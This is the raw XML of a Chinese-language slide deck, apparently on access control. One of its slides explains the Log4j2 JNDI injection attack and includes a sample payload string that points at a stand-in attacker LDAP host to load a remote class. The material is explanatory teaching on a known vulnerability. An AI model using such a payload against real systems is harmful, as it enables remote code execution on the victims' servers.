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64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4.png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阿里安全时间技术揭秘</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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52707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攻击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原理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23440" y="1599565"/>
            <a:ext cx="8583930" cy="175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攻击者发请求，注入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jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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，例如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${jndi:ldap://com.attacker:9999/AttackClass}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" err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被攻击的应用使用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log4j2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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处理用户请求信息，上述注入被触发，从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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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服务获得工厂类，在被攻击者虚拟机内执行工厂类的工场方法。由于工厂方法是在被攻击者虚拟机内执行，这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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由攻击者编写的类可以做任何事情！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" err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dirty="0" err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dirty="0" err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258310" y="3710305"/>
            <a:ext cx="1878330" cy="12649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被攻击的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用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8261350" y="4975225"/>
            <a:ext cx="151638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攻击者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务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8261350" y="3062605"/>
            <a:ext cx="151638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攻击者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="直接箭头连接符 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="3"/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6136640" y="4342765"/>
            <a:ext cx="2124710" cy="1089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3" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6136640" y="3519805"/>
            <a:ext cx="2124710" cy="822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1031240" y="3222625"/>
            <a:ext cx="1967865" cy="1927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攻击者使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求工具在请求参数、请求头中注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jndi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接箭头连接符 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="3" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2999105" y="4186555"/>
            <a:ext cx="1259205" cy="156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环保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230</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>17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宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>仿宋</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>方正舒体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>环保</vt:lpstr>
      <vt:lpstr>访问控制</vt:lpstr>
      <vt:lpstr>访问控制机制伸缩性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访问控制</dc:title>
  <dc:creator>b yq</dc:creator>
  <cp:lastModifiedBy>白玉琪</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-12T22:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-25T04:06:56Z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BAE4E66603624752AE1039DC1099D9D6</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.11194</vt:lpwstr>
  </property>
</Properties>
</file>